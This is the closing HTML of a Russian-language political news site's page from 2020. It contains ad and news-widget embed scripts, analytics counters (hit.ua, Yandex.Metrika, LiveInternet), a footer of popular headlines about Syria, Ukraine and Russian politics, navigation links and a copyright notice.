<!-- Composite Start --> <div id="M255051ScriptRootC682985"> <div id="M255051PreloadC682985"> Загрузка... </div> <script> (function(){ var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:'; var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M255051ScriptRootC682985")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];} catch(e){var iw=d;var c=d[gi]("M255051ScriptRootC682985");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=682985;c[ac](dv); var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.lentainform.com/p/r/pravdoryb.info.682985.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})(); </script> </div> <!-- Composite End -->	                	<div class="sidenews_title">
<hr />
<div class="name" style="width: 200px;">СМИ партнеров</div>
</div>

<div id="pravdoryb_informer">&nbsp;</div>
<script type="text/javascript" src="https://pravdoryb.info/template/widget.js"></script><script type="text/javascript">
mmInformerloadWidget('pravdoryb_informer', 'https://pravdoryb.info/widget/mixedNews?id=1&limit=6');
</script>

<style>
table.mminformerv_widget_news .title {
word-break: break-word;
text-align: left;
font-family: georgia;
font-size: 13px;
}
</style>	                		                		                			
		               			
						<div class="sidenews_title" style="height: 5px;">
<hr />
<div class="name" style="width: 150px;">Новости СМИ</div>
</div>

<!-- LentaInformNews Start -->

<div class="news-block-magick" id="LentaInformScriptRootN11857" style="margin-top:10px;">

<script>       
        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11857")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11857");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11857;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="https://jsn.lentainform.com/p/r/pravdoryb.info.11857.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script></div>
<!-- LentaInformNews End -->	                	
	                	
											</div>
				</td>
			</tr>
		</table>

		

	</div>
	
	<div class="clear"></div>
	
	<div><div style="margin-top:10px; text-align:center;" >

</div></div>
	<div><style>
table.footernews{margin-top: 10px; width: 100%;}
table.footernews td{vertical-align: top; padding: 0;}
table.footernews div.title{margin: 0; font-weight: normal; font-family: times; text-align: center; font-size: 17px;}
table.footernews .date{font-size: 10px; font-family: arial; margin: 0; color: #b1b2b5}
.footernews_title{margin-top: 20px; height: 10px;}
.footernews_title hr{border-top: 1px solid #1F1F1F;}
.footernews_title .name{position: relative; height: 22px; top: -22px; background: white; left: 100px; width: 220px; text-align: center; font-size: 22px; font-family: Times; color: #1F1F1F;}
</style>

<div class="footernews_title">
	<hr />
	<div class="name">Популярные новости</div>
</div>

<table class="footernews">
	<tr>
					<td style="width: 14%;">
				<a href="/rossiya-otvetit-za-siriyu-ubiystvo-turetskikh-soldat-bylo-poslaniem-kremlyu.html">
					<img src="/upload/editor/news/2020.02/150x130xC/5e4655a800157_1581667752.jpg" />
				</a>
				<div class="date">14 февраля 2020, 11:09</div>
				<div class="title">
					<a href="/rossiya-otvetit-za-siriyu-ubiystvo-turetskikh-soldat-bylo-poslaniem-kremlyu.html">Россия ответит за Сирию: Убийство турецких солдат было посланием Кремлю</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 14%;">
				<a href="/uscherbnaya-logika-i-nelovkie-zamechaniya-lavrov-v-kraskakh-rasskazal-chto-bylo-v-myunkhene.html">
					<img src="/upload/editor/news/2020.02/150x130xC/5e4b5c6fc9303_1581997167.jpg" />
				</a>
				<div class="date">18 февраля 2020, 06:39</div>
				<div class="title">
					<a href="/uscherbnaya-logika-i-nelovkie-zamechaniya-lavrov-v-kraskakh-rasskazal-chto-bylo-v-myunkhene.html">Ущербная логика и неловкие замечания: Лавров в красках рассказал, что было в Мюнхене</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 14%;">
				<a href="/donbass-nakanune-bolshikh-peremen.html">
					<img src="/upload/editor/news/2020.02/150x130xC/5e4aa58e5076f_1581950350.jpg" />
				</a>
				<div class="date">17 февраля 2020, 17:39</div>
				<div class="title">
					<a href="/donbass-nakanune-bolshikh-peremen.html">Донбасс накануне больших перемен</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 14%;">
				<a href="/oblegchyonnyy-arsenal-na-chto-budut-sposobny-rossiyskie-bpla-s-novymi-malogabaritnymi-boepripasami-195911.html">
					<img src="/upload/editor/news/2020.02/150x130xC/5e47920817525_1581748744.jpg" />
				</a>
				<div class="date">15 февраля 2020, 09:39</div>
				<div class="title">
					<a href="/oblegchyonnyy-arsenal-na-chto-budut-sposobny-rossiyskie-bpla-s-novymi-malogabaritnymi-boepripasami-195911.html">Облегчённый арсенал: на что будут способны российские БПЛА с новыми малогабаритными боеприпасами</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 14%;">
				<a href="/zelenskiy-khochet-zatmit-rech-putina-v-myunkhene---istochniki.html">
					<img src="/upload/editor/news/2020.02/150x130xC/5e473a2f7d327_1581726255.jpg" />
				</a>
				<div class="date">15 февраля 2020, 03:24</div>
				<div class="title">
					<a href="/zelenskiy-khochet-zatmit-rech-putina-v-myunkhene---istochniki.html">Зеленский хочет затмить речь Путина в Мюнхене - источники</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 14%;">
				<a href="/quotili-my-vvodim-sanktsii-ili-oni-podvinutsyaquot-lukashenko-postavil-moskve-usloviya.html">
					<img src="/upload/editor/news/2020.02/150x130xC/5e473a2a44bc8_1581726250.jpg" />
				</a>
				<div class="date">15 февраля 2020, 03:24</div>
				<div class="title">
					<a href="/quotili-my-vvodim-sanktsii-ili-oni-podvinutsyaquot-lukashenko-postavil-moskve-usloviya.html">&quot;Или мы вводим санкции, или они подвинутся&quot;: Лукашенко поставил Москве условия</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 14%;">
				<a href="/quotkartina-maslomquot-turetskie-voennye-pokidayut-siriyu-pod-konvoem-russkikh---voenkor-blokhin.html">
					<img src="/upload/editor/news/2020.02/150x130xC/5e4ad33d02df9_1581962045.jpg" />
				</a>
				<div class="date">17 февраля 2020, 20:54</div>
				<div class="title">
					<a href="/quotkartina-maslomquot-turetskie-voennye-pokidayut-siriyu-pod-konvoem-russkikh---voenkor-blokhin.html">&quot;Картина маслом&quot;: Турецкие военные покидают Сирию под конвоем русских - военкор Блохин</a>
				</div>
				<span class="date"></span>
			</td>
			</tr>
</table></div>
	
	<div class="footer">
		<!-- hit.ua --><noindex>
<!-- hit.ua --><a href="https://hit.ua/?x=121359" target="_blank"><script language="javascript" type="text/javascript"><!--
Cd=document;Cr="&"+Math.random();Cp="&s=1";
Cd.cookie="b=b";if(Cd.cookie)Cp+="&c=1";
Cp+="&t="+(new Date()).getTimezoneOffset();
if(self!=top)Cp+="&f=1";
//--></script> <script language="javascript1.1" type="text/javascript"><!--
if(navigator.javaEnabled())Cp+="&j=1";
//--></script> <script language="javascript1.2" type="text/javascript"><!--
if(typeof(screen)!='undefined')Cp+="&w="+screen.width+"&h="+
screen.height+"&d="+(screen.colorDepth?screen.colorDepth:screen.pixelDepth);
//--></script> <script language="javascript" type="text/javascript"><!--
Cd.write("<img src='https://c.hit.ua/hit?i=121359&g=0&x=2"+Cp+Cr+
"&r="+escape(Cd.referrer)+"&u="+escape(window.location.href)+
"' border='0' wi"+"dth='1' he"+"ight='1'/>");
//--></script> <noscript>
<img rel="nofollow" src='https://c.hit.ua/hit?i=121359&amp;g=0&amp;x=2' border='0'/>
</noscript></a> <!-- / hit.ua --> 

 <!-- Yandex.Metrika counter --> <script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter24820739 = new Ya.Metrika({id:24820739,
                    webvisor:true,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script> <noscript><div><img src="//mc.yandex.ru/watch/24820739" style="position:absolute; left:-9999px;" alt="" /></div></noscript> <!-- /Yandex.Metrika counter -->

<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet-->
</noindex>
		<div style="width: 100%; text-align: center; display: inline;">
			<a href="/">Главная</a>&nbsp;&nbsp;
            <a href="/category/v-rossii">В России</a>&nbsp;&nbsp;
			<a href="/category/politika">Политика</a>&nbsp;&nbsp;
			<a href="/category/analitika">Аналитика</a>&nbsp;&nbsp;
            <a href="/category/video">Видео</a>&nbsp;&nbsp;
            <a href="/category/voyna-na-ukraine">Война</a>&nbsp;&nbsp;
            <a href="/category/karikatury">Карикатуры</a>&nbsp;&nbsp;
			<a href="/category/poleznye-stati">Полезные статьи</a>&nbsp;&nbsp;
            <a href="/pravoobladatelyam.html">Правообладателям</a>&nbsp;
            <a href="/rss/index">RSS</a>&nbsp;&nbsp;
            <a href="https://m.pravdoryb.info" rel="nofollow">Мобильная версия</a>&nbsp;
			            
           
		</div>
	</div>
    
    <div class="copyright">
     © 2020 ПравдоРУБ &nbsp;&nbsp;&nbsp;Все публикуемые материалы принадлежат их владельцам.&nbsp;&nbsp;&nbsp;
Использование материалов сайта приветствуется при наличии активной обратной ссылки на www.pravdoryb.info. &nbsp;&nbsp;&nbsp;
Администрация сайта может не разделять точку зрения авторов материалов, которые размещенны на сайте.
</div>
</div>



</body>
</html>